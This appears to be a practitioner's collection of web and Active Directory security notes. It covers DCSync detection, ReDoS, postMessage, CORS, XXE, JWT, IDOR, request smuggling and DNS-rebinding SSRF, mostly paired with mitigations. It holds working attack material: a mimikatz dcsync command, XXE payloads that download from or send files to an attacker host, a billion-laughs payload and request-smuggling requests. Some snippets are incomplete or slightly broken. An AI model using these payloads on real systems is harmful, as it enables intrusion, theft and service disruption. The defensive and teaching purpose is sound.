AD replication-based attacks [1]
The specification of the MS-DRSR protocol used by DCs when replicating in an Active Directory environment dictates the IDL_DRSGetNCChanges
method of the DRSUAPI RPC interface used to replicate changes to NC replicas.
The requisite permissions to conduct a DCSync operation, as prescribed by default, are vested in the following categories of entities:
- Domain Controllers:
- The
Ds-Replication-Get-Changes
privilege is delegated fromNT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS
. - The
DS-Replication-Get-Changes-All
privilege is delegated from$DOMAIN\Domain Controllers
. - Members of the
BUILTIN\Administrators
group, which encompasses theDomain Admins
andEnterprise Admins
.
The enumeration of the proprietors of the aforesaid privileges can be done via the Get-ACL
cmdlet:
$dcdn = 'DC=CONTOSO,DC=LOCAL';
$guid = '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2';
(Get-ACL -Path 'AD:$dcdn').Access | Where-Object {$_.ObjectType -match '$guid'}
During the processing of the IDL_DRSGetNCChanges
request by a domain controller, the validation of access rights is executed by means of a IsGetNCChangesPermissionGranted
procedure. This procedure is composed of several phases, which are articulated as follows:
- An evaluation of the client's extended privilege denominated as
Ds-Replication-Get-Changes
(1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
) against the domain object. - The
IsRevealSecretRequest
method confirms an attempt to request secret attributes followed by checking the client rightDS-Replication-Get-Changes-All
(1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
) against the domain object. - The
IsRevealFilteredAttr
method confirms an attempt to request attributes as part of a filtered set, followed by a check of client rightsDs-Replication-Get-Changes-In-Filtered-Set
(89e95b76-444d-4c62-991a-0facbeda640c
) chained withDS-Replication-Get-Changes-All
The confidentiality of an attribute is determined using an IsSecretAttribute($ATTRIBUTE)
procedure, which matches the type of an attribute against a predefined list.
Detecting and blocking dangerous replication traffic at the network level is easier in a segmented network, where DCs are located within a separate VLAN. Correct segmentation allows for signatures to be introduced that target DCE/RPC DRSUAPI calls originating from sources outside the DC VLAN, namely IDL_DRSGetNCChanges
requests from a client address other than those in the DC list.
Native event 4662 (“An operation was performed on an object”) is generated during replication from objects that have an entry in the domain object’s SACL and during the operation use the Ds-Replication-Get-Changes
/ DS-Replication-Get-Changes-All rights
/Ds-Replication-Get-Changes-In-Filtered-Set
against domain.
POC
Adding records with the extended rights Ds-Replication-Get-Changes
and Ds-Replication-Get-Changes-All
to the DACL of the domain ACE object. Adding can be done through the native cmdlets Get-Acl
and Set-Acl
. The ACE of the ActiveDirectoryAuditRule
class is generally identical to the ActiveDirectoryAccessRule
, with the only difference being the required AuditFlags
attribute and the addition via AddAuditRule
.
>> $path = 'AD:\DC=contoso,DC=local';
>> $acl = Get-ACL -Path $path -Audit;
>> $ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule(
>> [System.Security.Principal.IdentityReference] ([System.Security.Principal.SecurityIdentifier] 'S-1-5-21-3711008237-1532375651-712317569-500'),
>> [System.DirectoryServices.ActiveDirectoryRights] 'ExtendedRight',
>> [System.Security.AccessControl.AccessControlType] 'Allow',
>> [System.GUID] '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'); # 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
>> $acl.AddAccessRule($ace);
>>
>> Set-ACL -Path $path -AclObject $acl
For example, logging of the execution process of mimikatz' lsadump::dcsync
module on behalf of a test user is viewed by the Get-WinEvent
cmdlet with filtering settings.
.\mimikatz.exe "lsadump::dcsync /domain:contoso.local /user:Administrator" exit
Get-WinEvent -FilterHashtable @{ID = 4662; LogName = '*'; StartTime = ((Get-Date) - (New-TimeSpan -Days 1))} | Where-Object {$_.Message -match 'Access Mask:.*0x100' -and $_Message -match 'Properties:.*\n.*{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}' -and ($_Message -notmatch 'Account Name:.*WIN-IPNA74QL8IE' -and $_Message -notmatch 'Account Name:.*WIN-9IGSLDJ4THF')} | Format-List
Catastrophic backtracking mitigation/prevention
Execution time limitation, recursion limitation, text engines
The simplest solution would be to introduce a limit on the execution time of the comparison operation, for example, .NET allows you to pass the function of setting a new object of the Regex class property MatchTimeout
:
AppDomain domain = AppDomain.CurrentDomain;
// Set a timeout interval of 2 seconds.
domain.SetData("REGEX_DEFAULT_MATCH_TIMEOUT", TimeSpan.FromSeconds(2));
Object timeout = domain.GetData("REGEX_DEFAULT_MATCH_TIMEOUT");
Console.WriteLine("Default regex match timeout: {0}", timeout == null ? "<null>" : timeout);
Regex rgx = new Regex("[aeiouy]");
Console.WriteLine("Regular expression pattern: {0}", rgx.ToString());
Console.WriteLine("Timeout interval for this regex: {0} seconds", rgx.MatchTimeout.TotalSeconds);
Furthermore, the Ruby Regexp class also affords the option of introducing a timeout
parameter when creating a regex object, as demonstrated below:
re = Regexp.new("(b|a+)*c", timeout: 4)
q = 'a' * 25 + 'd' + 'a' * 4 + 's' #=> "aaaaaaaaaaaaaaaaaaaaaaaaaadaaaas"
/(b|a+)*s/ =~ q #=> Regexp::TimeoutError
An additional strategy to lower server load is to introcuce a recursion limit. PCRE engines provide the capability to restrict recursion during comparisons through the (*LIMIT_RECURSION=<LIMIT_SET>)
modifier, with LIMIT_SET
signifying the number of recursive iterations.
Moreover, the use of text-based engines fundamentally avoids backtracking due to their linear iteration principle and reduced complexity. Such engines have a finite set of capture patterns available for use within an expression, always return a single and the largest match, and yield lower performance compared to classical RegEx-directed engines. Patterns such as Lazy/Possessive quantifiers, atomic grouping, and backreferences are inaccessible for processing by text-based engines. This principle is infrequently employed and is more commonly integrated into hybrid engines with dynamic paradigm shift in match selection.
Possessive quantifiers, atomic grouping, secure context
The recommended method would be to change the expression being compared. If a catastrophic backtracking condition occurs in the case of nested quantified patterns, it is necessary to reduce the expression to the form of mutually exclusive conditions so that the engine does not end up in a state of a long recursive iteration. Possessive quantifiers/atomic groups do not backtrack after an unsuccessful match. This is generaly used to improve performance.
initial_ex = /(x+)+y/
possessive_ex = /(x+)++y/
atomic_ex = /(?>x+)+y/
Depending on the expression's intended purpose, it may make sense to embed it within a secure context, ensuring it meets the expression's requirements. For instance, the expression ((([a-z]{0,254}[a-z])((?<!\.s)))\.){0,20}(([a-z]{0,254}[a-z]))(&)
can be securely evaluated by appending \A
before the problematic regex, as follows:
ruby initial_ex = /((([a-z]{0,254}[a-z])((?<!\.s)))\.){0,20}(([a-z]{0,254}[a-z]))(&)/ safe_context_ex = /\A#{initial_ex}/
Another example can be found here: ???
ReDoS
Since the use of RegEx, including in filters for processing user input, is very common, performing a comparison of a dangerous regular expression against an externally controlled sequence can lead to server failure due to the long processing of the malicious request.
Any regular expression whose comparison with a special string can result in an exponential increase in the number of steps to complete the operation is a potential ReDoS sink. Such growth is a consequence of a catastrophic return.
One of the operating principles of RegEx engines is backtracking. Typically, it occurs when the string being compared does not match an expression consisting of successive quantified groups, with the goal of finding a match by covering all possible combinations with the algorithm. Thus, dangerous RegEx necessarily contain a quantified capture pattern or is unoptimized.
Selecting a line to provoke a catastrophic return involves using the RegEx debugger. Manual analysis of a regular expression depends on the quantified pattern principle. For example, with a vulnerable part of a regular expression that includes a greedy quantifier, to reproduce catastrophic backtracking, the step-by-step behavior of the RegEx engine must include a repeatedly repeated process: the capture of a long sequence by the algorithm and its subsequent multi-stage rollback.
For example:
\A[0-9a-zA-Z][0-9a-zA-Z_.-]*[0-9a-zA-Z\^]\.{2,3}[0-9a-zA-Z][0-9a-zA-Z_.-]*[0-9a-zA-Z\^]\z
The comparison of the patterned sequence w..w..w..w..w...................
against the aforementioned RegEx causes a catastrophic backtracking. The The problem here lies in (1) the portion [0-9a-zA-Z\^]\z
, which compels the algorithm to regress to the initial match and (2) the group [0-9a-zA-Z_.-]
, supported by the greedy quantifier *
, freely spanning the rest of the line.
The exponential increase in the number of comparison steps when adding the same number of characters in this example is not so fast, but is sufficient to crash the server if the threshold for the number of characters allowed per input is high enough. For 800 characters, the engine will need over 130,000 steps to process the expression.
For comparative purposes, the PCRE2 engine, when coupled with the expression (a*)*b\z
and comparing the string aaaaaaaaaaaaaa
, consisting of 14 characters, against it, takes more than 160,000 steps. Here, the dependence of resource consumption on the number of characters in the compared string differs significantly from that in the first example: the expression contains a nesting of groups with identical capture targets, which greatly increases the number of possible combinations.
postMessage
The postMessage
method is designed to communicate between Window
objects, bypassing SOP.
The master resource's Javascript references/sets the window
object (w = window.open
/ contentWindow
...) and then passes the message via postMessage()
, received via the event by addEventListener('message' .. .)
on a target page.
During cross-window message initialization, unless there is a need to broadcast via postMessage
, it is recommended to assign the targetOrigin
parameter (postMessage(message, targetOrigin, transfer)
) to the URI of the target window, instead of the wildcard character, to avoid data leaks.
The subsequent configuration consists of a postMessage broadcast:
let data = { a: "b", c: "d" };
var popup = window.open(/*popup details*/);
popup.postMessage(JSON.stringify(data), '*');
In case of processing a malicious message event, the minimal risk is falsification of the legitimate communication flow between the expected partners of the page; in the worst case, there is a risk of executing arbitrary javascript (thus, XSS) code when constructing HTML based on the received data, therefore event listeners on the receiving side must be provided with mechanisms for checking the origin of the received message.
The implementation of the above verification mechanism is key, it must effectively compare the origin
attribute with the list of allowed origins, the more specific the list, the more reliable the check.
Ineffective origin validation using the 'addEventListener' interface:
window.addEventListener('message', function (e) {
e.origin.indexOf('example.com') > -1;
});
Appropriate origin check:
check_hostname = function(e) {
var t = new Set(["one.example.com", "two.example.com"]);
try {
var i = new URL(e).hostname;
return t has(i) ? "APPROVED_URL" : "INVALID_URL"
}
catch (e) {
return "INVALID_URL"
}
}
Any implementation of pure sequences in the page code / jQuery selectors / eval
functions, or dynamic construction of location
, href
/src
atributes from the passed data should be regarded as potential XSS sinks, and therefore, Even if the origin
check is correct, in case the cross-window messaging component is attacked from trusted domains, as a second line of defense for the listener, the data processing functions bound to the message eventListeners should have sanitization measures, e.g. DOMPurify.
In the context of hosting the subject component for validation or the replication of vulnerabilities locally, the verification stream of the origin of the received message can be traced through the manipulation of the hostname resolution pattern within the connection parameters of Burp Suite.
CORS
Upon CORS introduction (a measure aimed at mitigating client-side SOP constraints for web services in need for unlimited cross-domain interactions), along with its benefits, a severe security risks has arisen.
The mitigation measure introduced was the pre-flight mechanism. It was developed along with CORS for the purpose of categorizing servers into those aware of the new universally acknowledged browser CORS policy and those unaware about it. This behavior serves as a check for the adequacy of the client-server communication flow. From the client's perspective, it ensures that its requests to the server will be responded to properly and as-expected, thereby preventing a ineffective stream of requests in case of an invalid server configuration. The server ensures that the client's request align with the configuration settings in-use.
If it is necessary to optimize and reduce the amount of traffic between the client and the server, there is a number of options to bypass the need for pre-flight messages: from server-side caching, required due to permanent browser policies for maximum caching periods of responses to pre-flight requests on the client side, to refactoring CORS-safe requests.
CORS-safe requests do not cause pre-flight and are identical in format to requests initiated, for instance, through an HTML form. They are restricted to the HTTP methods of GET, HEAD, and POST, and a limited set of permissible non-standard browser headers, one of which, Content-Type, may bear values such as text/plain
, multipart/form-data
, and application/x-www-form-urlencoded
.
One can talk about the role of pre-flight requests in the security of cross-origin interactions for a long time, especially considering that the need for it, in general, appeared with an introduction of CORS, which, in essence, is a plug in the security hole that appeared with new cross-origin request policies. However, analysed in current context, pre-flight requests really cut off a large layer of the CSRF attack surface, which has expanded greatly since the introduction of CORS.
An excessively permissive CORS policy, notably one that includes (1) any unvalidated or incorrectly validated, via RegEx, reflect/embed of an Origin header (or null) in ACAO (2) incorrect configuration of allowed methods/headers in regards to sensitive endpoints can lead to serious consequences for the safety of service users.
Insufficient origin configuration:
public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException {
HttpServletResponse res = (HttpServletResponse) response;
String providedOrigin = request.getParameter("origin");
res.setHeader("Access-Control-Allow-Origin", providedOrigin);
chain.doFilter(request, response);
}
Validation of the received Origin against an Allow-List:
public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain) throws IOException, ServletException {
HttpServletResponse res = (HttpServletResponse) response;
String providedOrigin = request.getParameter("origin");
String allowedOrigin = valid(providedOrigin);
res.setHeader("Access-Control-Allow-Origin", allowedOrigin);
chain.doFilter(request, response);
}
private String valid(String providedOrigin) {
if (providedOrigin != null && (providedOrigin.equalsIgnoreCase("https://example.com") || providedOrigin.equalsIgnoreCase("https://example2.com"))) {
return providedOrigin;
}
return "https://example.com";
}
XXEi
Exploitation vectors:
- RCE through the 'expect://' wrapper on a PHP server with an Expect extension. Given the constraints caused by the prohibition of spaces and the parser's refusal to decode encoded symbols, to construct a URI it's possible to utilize the system variable $IFS as the delimiter.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY file SYSTEM "expect://curl$IFS-O$IFS'attacker-server.com:8000/xxe.php'">
]>
<root>
<name>Joe</name>
<email>START_&file;_END</email>
</root>
- File extraction via SSRF through OOB XXEi in blind context
<?xml version="1.0" ?>
<!DOCTYPE aaa [
<!ENTITY % bbb SYSTEM "http://attacker-server.com:8090/xxe.dtd">
%bbb;
%ccc;
]>
<a>&eee;</a>
<!-- xxe.dtd -->
<!ENTITY % ddd SYSTEM "file:///var/www/web.xml">
<!ENTITY % ccc "<!ENTITY eee SYSTEM 'ftp://ATTACKERSERVER:2121/%ddd;'>">
- Classic billion laughs DoS.
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
]>
<lolz>&lol6;</lolz>
Mitigation measures include:
- disable XInclude
- disable XXE.
- disable DTD or the recourse to XSD as a viable alternative.
- In the event that an application interfaces with JSON, one must take care to ensure that endpoints do not process XML.
- Additionally, it may make sense to restrict the schemas employed and the transmission of data in the response issued to the client.
For guidance on migration refer to the following resource: https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
.
For example, in .NET 8 XmlReader objects by default are initialized with an XmlReaderSettings.DtdProcessing = Prohibit and XmlReaderSettings.XmlResolver = false.
TLS 1.3
In the context of the TLS protocol, a connection is the state of mutual communication in which both parties possess a certain undisclosed sequence, shielded from third parties, for subsequent utilization within the the context of mutual data encryption/decryption. For example, the procedure of a server-client handshake in the instance of TLS 1.3 utilizing the TLS_AES_256_GCM_SHA384 cipher is as follows:
- The client generates ephemeral key pairs.
- Client Hello: The client sends a sequence containing the client random, administrative information (including a list of supported cipher suites, a list of supported protocol versions, session ID, and so forth), and client public keys.
- The server generates an ephemeral key pair according to the client's preferences.
- Server Hello: The server sends a sequence comprising the server random, administrative information (selected cipher, chosen protocol version, and so forth), and an ephemeral public key.
- The server generates an encryption key for subsequent client-server communication establishment, deriving it from the client's public key, the server's private key, and hashed values of ClientHello and ServerHello.
- The client generates the aforementioned key. Thus, all further communication from the client to the server is encrypted.
- Server Certificate: The server sends certificate(s).
- Server Certificate Verify: The server sends a signature and subsequent "Server Handshake Finished" message. Due to the mandatory generation of ephemeral key pairs during the connection establishment according to TLS version 1.3, for the purpose of certificate ownership confirmation, the server signs hashed values of the entire preceding server-client message using the certificate's private key, for subsequent validation by the client using the public key from the certificate.
- The server generates a shared secret, utilizing the values of the current encryption key and the hashes of each handshake message, commencing with ClientHello and concluding with Server Handshake Finished.
- The client generates a shared secret using a similar algorithm.
- Client Handshake Finished: The client sends an affirming message with a challenge.
- Client Application Data: The client sends data.
- Server New Session Ticket: The server sends two messages with one-time session tickets.
- Server Application Data: The server sends data.
JWT Header Injections & Algoritm Confusion attacks
The JWT format token is usually generated as follows: After the client transmits its credentials to the server and validates them, the server generates a JWT token. The JWT token is generated by the server using the following values: 1. HEADER, which contains information pertaining to the server-side JWT configuration (such as the employed algorithm for signature generation/validation, the identifier of the key for utilization (???)). 2. PAYLOAD, generated by the server according to a template based on preset informational values, as well as static and session information about the client (e.g. user ID, token update data, token representative resource, token usage context) 3. SIGNATURE, serving as the "seal" of the token. SIGNATURE is an encapsulation of a hash value of the concatenation of HEADER and PAYLOAD, encrypted with a key or key pair, as defined by the chosen encryption scheme.
Usually, JWT refresh token is also generated. Upon the subsequent presentation of the provided token by the client, it's validated by server via the repetition of signature generation and its comparison with the presented signature.
Attacks of the "algorithm confusion" type are reliant on the assumption that, during JWT validation, instead of mandatorily sticking to predefined algorithms, the server will fall back to an algorithm specified within the received token.
For instance, attacks on systems implementing asymmetric encryption algorithms, such as RS256, can, in theory, contain a misconfiguration, where, after reading the alg
value in the HEADER of the token, the server proceeds to validate it by utilizing a public key as a shared secret, instead of using it's private key for that.
A similar vulnerability may arise if a "none" algorithm is specified.
Furthermore, the injection of jwk and jku headers within the scope of user authentication by a vulnerable server will result in the server employing keys or their sources, as contained in supplied tocken's HEADER, for it's validation.
A mitigation strategy for such attacks should consist of the establishment and utilization of a static signature validation algorithm or a list of expected algorithms. If a list is chosen - avoid mixing asymmetric algorithms with HS.
//// Program.cs
// ...
builder.Services.AddAuthentication(x =>
{
x.DefaultAuthenticateScheme = JwtBearerDefaults.AuthenticationScheme;
x.DefaultChallengeScheme = JwtBearerDefaults.AuthenticationScheme;
x.DefaultScheme = JwtBearerDefaults.AuthenticationScheme;
}).AddJwtBearer(x =>
{
x.TokenValidationParameters = new Microsoft.IdentityModel.Tokens.TokenValidationParameters
{
// grabbing Issuer and Audience from appsettings.json
ValidIssuer = config["JwtSettings:Issuer"],
ValidAudience = config["JwtSettings:Audience"],
// safely grabbing JWT_SECRET_KEY from an environment. This can be provided to a container via a,
// for example, CD-pipeline-side K8s Pod object that is referencing a SealedSecret
IssuerSigningKey = new Microsoft.IdentityModel.Tokens.SymmetricSecurityKey(
System.Text.Encoding.UTF8.GetBytes(Environment.GetEnvironmentVariable("JWT_SECRET_KEY"))
),
// requiring algorithm usage, this prevents algorithm confusion attacks, if set properly
ValidAlgorithms = new[] {"HS256"},
// setting validation policies
ValidateIssuer = true,
ValidateAudience = true,
ValidateLifetime = true,
// this prevents arbitrary signature validation
ValidateIssuerSigningKey = true
};
});
// ...
Parameter-based BAC & IDOR
In the context of IDOR testing, the security of the target relies entirely upon the quality of the implementation of the CRUD functionality. In my experience, the standard CRUD functionality can be categorized as follows:
- Users: Personal settings, owned resources, interactions, memberships.
- Spaces: Space settings, space participants, resources in the ownership of the space (which may be subordinate spaces).
At present, BAC vulnerabilities such as "passing an intended accessor ID to the controller" or "altering the value of the isAdmin parameter for access to the administrator panel," while they do occur, are less common. Nonetheless, as is often the case with scalability, problems arise.
In general, within the context of spaces, the rights of service clients can be classified into 7 user levels:
- Administrator
- Moderator
- Owner Participant (creator of subordinate ownership within a space)
- Participant
- Participant with reduced privileges
- User (a user with no access to the space)
- Unauthorized User
The functionality of each subcategory is determined by a pool of API endpoints responsible for specific actions on the target resource and depends on category settings. All of this can be be usefull in delineating CRUD functionality according to access levels, as it is crucial to test each endpoint separately using the authorizations of each user level with access restrictions to that endpoint.
The functionality of Create, Update, and Delete for user categories is almost always protected against IDOR checks by the server-side verification of provided user's access wrt an endpoint in question. Bypassing these restrictions falls outside the scope of IDOR testing. Usually when, passing some unknown parameters as part of the request one has to check if these are mandatory, it's source and it's calculation algoritm. When passing parameters that are responsible for access level checks one has to check it's validation on the server-side.
Consider a hypothetical scenario:
Imagine a forum with a certain community, where a community moderator posts a private message accessible only to moderators.
In this case, considering the classification above, the community can be classified as a "space," and the post as a subordinate space, since it contains distinct settings.
Upon publication, the post is assigned an Id value of 123
, following the previous publicly accessible post with Id 122
. This allows users of the participant
level to easily determine Ids of private posts. When accessing the resource directly (vulnapp.com/group_3/p123
), the server correctly verifies the authentication measures. However, when accessing the REST API endpoint changeViewPermissions
, responsible for altering the list of user levels with access to the post, the server incorrectly verifies the values of the Authorization
and Cookie
headers, instead relying on the parameters username
and secret_value
.
What secret_value
is remains unknown to the attacker, but by making a similar request in their own community and tracking the source of the value, they notice that it is obtained in response to a certain API call by passing their own userid
value in the request. The attacker, upon entering the list of moderators in the target community and obtaining the desired userid, decides to make a similar API request to obtain the "secret_value" but this time by passing the moderator's userid
value, and having received the requested value in the response, proceeds to make a request to change the visibility settings of the target private post, resulting in a positive outcome.
POST /group_3/p123/changeViewPermissions
Host: vulnapp.com
Authorization: Bearer ***
Cookie: ***
{"userid": "6343", "secret_value": "***"}
HTTP Request Smuggling
HTTP Request Smuggling - An attack through the HTTP protocol based on the collision of conflicting configurations of mechanisms that determine the total character count of an incoming user request on both the Front-end and Back-end servers during request processing.
When utilizing popular server software solutions, such issues typically do not arise due to the security measures that are often enabled by default. Nevertheless, it is evident that as software becomes obsolete, custom configurations are introduced by developers for header processing or the determination of request length, lesser-known server solutions unfamiliar to developers are implemented, significant vulnerabilities may be introduced.
Possible security measures include:
- Given its inherent nature, the HTTP/2 protocol version is entirely immune to request smuggling attacks. Therefore, a logical solution would be to exclusively implement HTTP/2 request processing on both servers.
- If using HTTP/2 on both sides is not feasible, mitigating a significant portion of HTTP/2 downgrading attack vectors can be achieved by employing HTTP/1.1.
- Employing a uniform method for determining request length on both servers and rejecting any requests that contain an inactive method as potentially hazardous.
- Vulnerabilities of the CL.0 and H/2.0 types arise when the back-end disregards the value of the CL header and assumes that all received requests have empty bodies. Avoid such behavior.
- To prevent H/2 downgrading attacks with properly filtered CL/TE headers / TE.TE / CL.0, it is necessary to conduct server response testing for header obfuscation, CRLFi, header discrepancy. Additionally, disable unused HTTP methods.
The complexities of exploitation primarily center on identifying front-end request reformatting and normalization patterns for correct back-end server processing. Simultaneously, when both servers employ the HTTP/1 protocol, the vulnerability relies on differences in header "Content-Length" and "Transfer-Encoding" policy interpretations, filtering, and processing. In cases where a downgrade of the HTTP protocol version is required for back-end server request processing, the vulnerability relies on errors, absence, or vulnerabilities in CL/TE (received within the context of an HTTP/2 request) header filtering systems.
- The Content-Length (CL) header is designed to count the number of bytes in an HTTP request, starting immediately after the CRLF delimiter sequence. In brief, CL determines the length of the HTTP request body, and its value is the number of bytes in that body. This is necessary for the server to determine the point at which it should stop reading the request and begin processing it.
- Transfer-Encoding: chunked serves the same purpose but allows the server to dynamically process parts of the received body without waiting for the complete request. According to the official HTTP/1.1 documentation, this is useful when transmitting a large amount of data in a request to the server. When specifying this header with the "chunked" value, the data in the request body is transmitted in chunks. Each chunk, starting from the first, must begin with a sequence that represents the number of octets in the chunk (immediately following the sequence) and a subsequent CRLF (e.g.,
b\r\naaadsfddsds
). The message ends with a final "zero-length" chunk, followed by a CRLF.
Let's consider examples: Suppose the server does not reuse TCP connections for different clients. In that case, the attacker must receive a response to the smuggled request within the main request's body. Here, the HEAD method allows transforming the vulnerability into non-blind, as the response to it contains a CL header equal to the corresponding GET request path. To avoid timeout errors and truncation of the received response body, you can use an endpoint with reflection, as shown below. Here is an example of request tunneling through H/2 downgrading via CRLFi, resulting in cache poisoning.
:method = HEAD
:scheme = https
:path = /smth.js HTTP/1.1\r\n
Host: vulnerable-website.com\r\n
\r\n
GET /reflection-here?<script>alert()<script>sssssssssssssssssssssssssssssssssssssss HTTP/1.1\r\n
Foo: x
:authority = vulnerable-website.com
In accordance with the prescribed scenario, the backend processing encompasses the reception of requests in the subsequent manner:
HEAD /smth.js HTTP/1.1
Host: vulnerable-website.com
GET /reflection-here?<script>alert()<script>sssssssssssssssssssssssssssssssssssssss HTTP/1.1\r\n
Foo: xHTTP/1.1
Host: vulnerable-website.com
Content-Type: text/html
Regarding the criticality in the simplest CL.TE request smuggling: A request smuggling attack resulting in queue poisoning occurs when TCP connections between front-end and back-end servers are not reused multiple times. The technique involves the attacker sending a wrapper request containing a smuggled request that is correctly processed and remains unchanged when merged with the subsequently received client request. The back-end server processes the root request, leaving the smuggled request "hanging" until the next legitimate client request is received. Due to the previously defined structure of the smuggled request, which remains unchanged when additional characters are added to it, the server processes and forwards the previous smuggled request to the client upon receiving the next one. Consequently, until the connection is updated, the back-end server's response queue will permanently consist of a single unprocessed request, creating a desynchronization cycle that affects all server users, resulting in at least a service disruption and the exposure of numerous session keys.
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 61
Transfer-Encoding: chunked
0
GET /anything HTTP/1.1
Host: vulnerable-website.com\r\n\r\n
SSRF via TOCTOU DNS Rebinding
In the context of Server-Side Request Forgery (SSRF), DNS Rebinding is a TOC/TOU attack, wholly reliant on a domain controlled by the attacker and its DNS configuration, where the attacker manipulates the IP address resolution process performed by the vulnerable web application server.
An example public DNS Rebinding service is 1u.ms
, offering a range of convenient configuration solutions along with a publicly accessible event log, that can be useful if you don't have a machine assigned an address from a public address space.
Let's imagine a hypothetical scenario for circumventing local IP address filtering using this technique:
- Suppose that the target web application's back-end server expects a URI within an HTTP request directed to a specific API endpoint. The server's objective is to retrieve the web page's content based on the provided URI and store its render in a database for subsequent client viewing.
- A protective function against SSRF has been implemented on the back-end server which is filtering IP addresses obtained from URIs, rejecting potentially dangerous addresses (e.g., the loopback interface address 127.0.0.1 or the "cloud localhost").
- The attacker, as part of a request to the target API endpoint, includes their server's domain name in the HTTP request. This domain is registered, hosted, and configured on a public DNS server as follows:
- The domain has two records. Let's assume that one record points to an IP address in the public IP space, such as
1.2.3.4
, and the other points to127.0.0.1
. - The configuration includes setting an extremely low Time-To-Live (TTL) value for the first IP's resolution response, preventing extended caching of the response on the receiving end.
- Consequently, the filtering function on the vulnerable server, when reaching out to the public DNS server to resolve the client-supplied domain name and apply filtering, obtains a "normal" IP address. Upon confirming the safety of the obtained address, it caches it for a very short duration. This cached record quickly becomes obsolete.
- Since the validating function has verified the safety of the obtained address, the request is passed to the executing function. However, due to the insecure configuration of this functionality on the back-end, instead of using the IP obtained by the validating function, the executing function queries the local DNS cache and, failing to find a record for the required host, makes another DNS request, assuming that the result will match what the validating function obtained. Nonetheless, the executing function receives a different IP address, pointing to the server's loopback interface.
- Consequently, when making a request to the local IP address, the server generates a response based on the components of the URI under the attacker's control, and the result of the request is displayed on the client side.
This scenario is presented here as an example and is far from exhaustive. The process of detection and exploitation heavily relies on the code and configurations on the target web server's side.